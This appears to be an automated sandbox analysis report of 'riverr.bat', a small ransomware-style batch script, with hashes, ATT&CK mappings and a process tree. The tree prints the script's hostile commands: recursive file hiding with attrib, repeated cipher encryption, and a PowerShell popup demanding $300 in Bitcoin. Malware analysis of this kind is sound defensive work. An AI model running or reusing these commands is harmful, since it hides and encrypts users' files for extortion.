19c3528c21b085b74d4f5d06f5665beb38d58ff9cd506153d8f158fa904b41ef

Analysis

max time kernel
126s
max time network
137s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
06/10/2023, 15:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

riverr.bat
Size

1KB
MD5

6f925a40f06c74f1a6f89ca3cebb5448
SHA1

a298915d2cfa3ba7178142e2d391bc1ab4978f7a
SHA256

19c3528c21b085b74d4f5d06f5665beb38d58ff9cd506153d8f158fa904b41ef
SHA512

07a85184c83df3aa4fe8abdcf0c9d2fafa020aaf61d54e5f6a8d11fddf10f715cb778c56112d53f9c46538c8441387d906c2b35fe7c6341deacfc85b3ecaeaee

Score

1^/10

Malware Config

Signatures

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3364	tasklist.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	3364	tasklist.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 340	3748	cmd.exe	71
PID 3748 wrote to memory of 340	3748	cmd.exe	71
PID 3748 wrote to memory of 4460	3748	cmd.exe	72
PID 3748 wrote to memory of 4460	3748	cmd.exe	72
PID 3748 wrote to memory of 684	3748	cmd.exe	73
PID 3748 wrote to memory of 684	3748	cmd.exe	73
PID 3748 wrote to memory of 1908	3748	cmd.exe	74
PID 3748 wrote to memory of 1908	3748	cmd.exe	74
PID 3748 wrote to memory of 4636	3748	cmd.exe	75
PID 3748 wrote to memory of 4636	3748	cmd.exe	75
PID 3748 wrote to memory of 4148	3748	cmd.exe	76
PID 3748 wrote to memory of 4148	3748	cmd.exe	76
PID 3748 wrote to memory of 1052	3748	cmd.exe	77
PID 3748 wrote to memory of 1052	3748	cmd.exe	77
PID 3748 wrote to memory of 4628	3748	cmd.exe	78
PID 3748 wrote to memory of 4628	3748	cmd.exe	78
PID 3748 wrote to memory of 3256	3748	cmd.exe	79
PID 3748 wrote to memory of 3256	3748	cmd.exe	79
PID 3748 wrote to memory of 5036	3748	cmd.exe	80
PID 3748 wrote to memory of 5036	3748	cmd.exe	80
PID 3748 wrote to memory of 68	3748	cmd.exe	81
PID 3748 wrote to memory of 68	3748	cmd.exe	81
PID 3748 wrote to memory of 2508	3748	cmd.exe	82
PID 3748 wrote to memory of 2508	3748	cmd.exe	82
PID 3748 wrote to memory of 3940	3748	cmd.exe	83
PID 3748 wrote to memory of 3940	3748	cmd.exe	83
PID 3748 wrote to memory of 2424	3748	cmd.exe	84
PID 3748 wrote to memory of 2424	3748	cmd.exe	84
PID 3748 wrote to memory of 2680	3748	cmd.exe	85
PID 3748 wrote to memory of 2680	3748	cmd.exe	85
PID 3748 wrote to memory of 2400	3748	cmd.exe	86
PID 3748 wrote to memory of 2400	3748	cmd.exe	86
PID 3748 wrote to memory of 3360	3748	cmd.exe	87
PID 3748 wrote to memory of 3360	3748	cmd.exe	87
PID 3748 wrote to memory of 3364	3748	cmd.exe	88
PID 3748 wrote to memory of 3364	3748	cmd.exe	88
PID 3748 wrote to memory of 3952	3748	cmd.exe	89
PID 3748 wrote to memory of 3952	3748	cmd.exe	89
PID 3748 wrote to memory of 1480	3748	cmd.exe	91
PID 3748 wrote to memory of 1480	3748	cmd.exe	91

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
684	attrib.exe
4636	attrib.exe
1052	attrib.exe
3256	attrib.exe
68	attrib.exe
3940	attrib.exe
2680	attrib.exe
340	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:340
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:4460
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:684
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:1908
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:4636
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:4148
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:1052
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:4628
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:3256
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:5036
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:68
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:2508
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:3940
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:2424
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:2680
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:2400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "$wshell = New-Object -ComObject WScript.Shell; $wshell.Popup('Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...', 0, 'Cap or Fact', 16)"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3360
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\system32\find.exe
  find /i "Ransomware"
  2⤵
  PID:3952
- C:\Windows\system32\notepad.exe
  notepad "C:\Users\Admin\Downloads\do not close.txt"
  2⤵
  PID:1480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ac3v03la.zie.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\do not close.txt

Filesize
111B

MD5
31a135982c340ddee33732d381694b3c

SHA1
4b7a551ae6507f2ed1fd6601d35d9e36915fef3b

SHA256
71b2cc62a02aee920d4984caf0fdb26fc32b14190d3bac9b0f88fe696708449c

SHA512
82344bca5b4ed3eb5eacfb2c79ffc8f799db5daa10e5cb4b89675bca4f251fcd933dd4e2319d11b3456cee08102e5bf5ce0a878a6296fe548ef2ae148287dcf7

Download Submit
memory/3360-6-0x0000019F760D0000-0x0000019F760F2000-memory.dmp

Filesize
136KB

Download
memory/3360-9-0x00007FF9A4730000-0x00007FF9A511C000-memory.dmp

Filesize
9.9MB

Download
memory/3360-11-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

Filesize
64KB

Download
memory/3360-10-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

Filesize
64KB

Download
memory/3360-12-0x0000019F76200000-0x0000019F76276000-memory.dmp

Filesize
472KB

Download
memory/3360-27-0x0000019F758D0000-0x0000019F758E0000-memory.dmp

Filesize
64KB

Download
memory/3360-31-0x00007FF9A4730000-0x00007FF9A511C000-memory.dmp

Filesize
9.9MB

Download